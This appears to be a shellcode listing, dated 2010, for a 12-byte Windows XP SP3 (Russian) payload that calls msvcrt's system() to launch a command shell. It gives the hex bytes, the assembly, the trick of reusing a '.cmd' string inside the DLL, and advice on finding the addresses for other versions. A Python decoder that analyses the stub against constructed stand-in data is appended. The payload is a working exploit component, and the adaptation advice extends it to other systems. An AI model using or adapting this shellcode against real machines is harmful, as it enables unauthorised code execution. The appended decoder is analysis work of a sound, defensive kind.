
# Title : win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes
# Published : 2010-03-24
# Author : lord Kelvin


68 45 13 C0 77  push 0x77C01345        ; pointer to "cmd" (the ".cmd" string in msvcrt.dll at 0x77C01344, skipping the dot)
B8 C7 93 C1 77  mov eax,0x77C193C7     ; msvcrt.system
FF D0           call eax               ; system("cmd")
 
In msvcrt.dll at 0x77C01344 there is the string ".cmd"; that's the trick. Pushing the address of its second byte (0x77C01345) hands system() the argument "cmd" without having to embed the string in the shellcode, which is what keeps it down to 12 bytes.
Both addresses are hardcoded and assume msvcrt.dll is loaded at its default base, so the code will work in WinXP SP3 Pro Rus only; in other versions you'd better search
for the string and the system(char*) address yourself.
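The same stub seen from the analyst's side: a decoder for the push/mov eax/call eax pattern that resolves the pushed pointer against a module image and the call target against an export map. This is an added example, not lord Kelvin's code; the module image and the export table are constructed stand-ins for the msvcrt.dll region the post describes, not data read from a real DLL.

```python
import re
import struct

# 12-byte stub from the listing: 68 imm32 (push) / B8 imm32 (mov eax) / FF D0 (call eax).
STUB_RE = re.compile(rb"\x68(.{4})\xB8(.{4})\xFF\xD0", re.DOTALL)


def decode_stubs(code):
    """Return [(offset, pushed_pointer, call_target)] for each stub found in code."""
    return [
        (m.start(), struct.unpack("<I", m.group(1))[0], struct.unpack("<I", m.group(2))[0])
        for m in STUB_RE.finditer(code)
    ]


def read_cstring(image, image_base, addr, limit=64):
    """Read a NUL-terminated string at virtual address addr from a flat module image."""
    off = addr - image_base
    if not 0 <= off < len(image):
        return None  # pointer does not fall inside this module
    end = image.find(b"\x00", off, off + limit)
    return image[off:end if end != -1 else off + limit].decode("latin-1")


def explain_stub(code, image, image_base, exports):
    """Resolve each stub's argument string and callee name against a module image.

    exports maps export name -> virtual address (constructed here, not parsed from a PE).
    """
    by_addr = {addr: name for name, addr in exports.items()}
    return [
        {"offset": off,
         "argument": read_cstring(image, image_base, ptr),
         "callee": by_addr.get(target)}
        for off, ptr, target in decode_stubs(code)
    ]


# Constructed stand-in for the msvcrt.dll region: ".cmd\0" placed so it sits at
# 0x77C01344, and system() assumed to live at 0x77C193C7 as in the listing.
IMAGE_BASE = 0x77C01300
IMAGE = bytearray(0x200)
IMAGE[0x44:0x49] = b".cmd\x00"
EXPORTS = {"system": 0x77C193C7}

# Encoding of the listing's mnemonics: push 0x77C01345 / mov eax,0x77C193C7 / call eax.
STUB = bytes.fromhex("684513C077B8C793C177FFD0")

if __name__ == "__main__":
    print(explain_stub(STUB, bytes(IMAGE), IMAGE_BASE, EXPORTS))
```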
 
Coded by lord Kelvin.